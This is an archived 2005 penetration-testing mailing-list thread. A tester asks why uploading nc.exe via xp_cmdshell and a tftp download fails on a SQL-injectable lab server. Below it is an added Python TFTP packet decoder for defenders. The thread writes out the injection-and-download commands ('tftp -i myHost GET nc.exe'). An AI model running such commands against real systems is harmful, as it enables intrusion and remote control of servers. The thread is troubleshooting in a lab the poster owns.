Re: TFTP and XP_CMDSHELL - Weird

From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Thu Jun 23 2005 - 09:47:53 EDT


>From: Diego Kellner <dkepler@gmail.com>
>Reply-To: pen-test@securityfocus.com
>To: Andres Molinetti <andymolinetti@hotmail.com>
>CC: pen-test@securityfocus.com
>Subject: Re: TFTP and XP_CMDSHELL - Weird
>Date: Thu, 23 Jun 2005 09:35:40 -0300
>
>Does the TFTP even start? What is the error message you get?

If it is of any use, I receive the following error on the target machine:
"tftp: No se puede escribir en el archivo local 'c:\xx.exe'"
(tftp: Not able to write in local file 'c:\xx.exe')

In a tcpdump on my TFTP server I get the following error:
10:41:37.528994 IP TARGET.1942 > SERVER.tftp: 48 ERROR EACCESS no se puede
abrir el archivo para escritura"
(cannot open file for writing)

>Check to
>see the permissions on tftp.exe (the SQL may not be properly patched,
>but someone might have taken the time to secure some key executables
>on WINNT directory according to best practices). If you have no direct
>access to see the permissions on this file, check to see if ping.exe
>works (another 'dangerous' executable that is usually secured along
>with tftp.exe, dcpromo.exe, etc).

I am testing it in my own controlled environment. I installed the TARGET
myself and it only has Windows 2000 SP4 with latest patches and SQL Server
2000 unpatched.
Ping works.
Besides, tftp works, but only with admin privileges.

>Regards,
>Kepler
>
>
>On 6/22/05, Andres Molinetti <andymolinetti@hotmail.com> wrote:
> > Hi, I am testing a Web App vulnerable to SQL Injection.
> > It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
> >
> > While trying to use the xp_cmdshell to upload nc.exe from my tftpd
> > server to the Webserver, I experienced some problems.
> >
> > I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
> >
> > As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost
> > GET nc.exe c:\nc.exe". File is downloaded.
> >
> > When I tried it through the web app it failed. I tried directly through
> > SQL Query Analyzer and it also failed.
> >
> > SQL is running as a low privileged account (sqlsvc)...
> >
> > Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET
> > nc.exe c:\nc.exe" and IT FAILED!!
> >
> > I can easily deduce that the problem is the TFTP client (tftp.exe)...
> >
> > Any ideas?
> >


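Added example, not code from anyone in this thread: a small Python decoder for TFTP datagrams (RFC 1350) that a defender can run over captured UDP payloads. It shows why the direction of the ERROR packet in the tcpdump line above matters: an ERROR sent by TARGET (the tftp.exe client) to SERVER means the client aborted because it could not write its local file, not that the TFTP server refused. The sample packets are constructed here, not captured.

```python
"""Decode TFTP (RFC 1350) datagrams to tell a client-side abort from a server refusal.
Added example, not code from the thread; the sample packets are constructed to mirror
the exchange described (a binary-mode GET of nc.exe, then an ERROR sent by TARGET)."""
import struct

OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
# RFC 1350 error codes; tcpdump renders code 2 as "EACCESS".
ERROR_CODES = {0: "Not defined", 1: "File not found", 2: "Access violation",
               3: "Disk full", 4: "Illegal TFTP operation",
               5: "Unknown transfer ID", 6: "File already exists", 7: "No such user"}

def decode_tftp(payload: bytes) -> dict:
    """Parse one TFTP datagram (the UDP payload) into a descriptive dict."""
    if len(payload) < 4:
        raise ValueError("TFTP datagram too short")
    opcode = struct.unpack("!H", payload[:2])[0]
    pkt = {"opcode": OPCODES.get(opcode, "UNKNOWN")}
    if opcode in (1, 2):                          # RRQ/WRQ: filename NUL mode NUL
        filename, mode, _options = payload[2:].split(b"\x00", 2)
        pkt["filename"] = filename.decode("latin-1")
        pkt["mode"] = mode.decode("ascii").lower()  # "octet" is what tftp -i requests
    elif opcode == 5:                             # ERROR: code(2) message NUL
        pkt["error_code"] = struct.unpack("!H", payload[2:4])[0]
        pkt["error_name"] = ERROR_CODES.get(pkt["error_code"], "Unknown")
        pkt["message"] = payload[4:].split(b"\x00", 1)[0].decode("latin-1")
    elif opcode in (3, 4):                        # DATA/ACK: block number
        pkt["block"] = struct.unpack("!H", payload[2:4])[0]
    return pkt

def classify_error(sent_by_client: bool, pkt: dict) -> str:
    """Locate the failure. An ERROR sent by the client (TARGET > SERVER in the
    tcpdump line) means the client aborted, typically because it could not open
    its own local file for writing; the server never refused the transfer."""
    if pkt["opcode"] != "ERROR":
        return "not an error"
    side = "client aborted (local file problem)" if sent_by_client else "server refused"
    return f"{side}: {pkt['error_name']} (code {pkt['error_code']}) '{pkt['message']}'"

# Constructed samples: the RRQ a binary-mode GET sends, and the client's ERROR
# carrying the Spanish message quoted above (2 + 2 + 43 + 1 = 48 bytes, consistent
# with the length tcpdump printed for that packet).
SAMPLE_RRQ = b"\x00\x01nc.exe\x00octet\x00"
SAMPLE_ERR = (b"\x00\x05\x00\x02"
              + "no se puede abrir el archivo para escritura".encode("latin-1") + b"\x00")

if __name__ == "__main__":
    print(decode_tftp(SAMPLE_RRQ))
    print(classify_error(True, decode_tftp(SAMPLE_ERR)))
```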


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT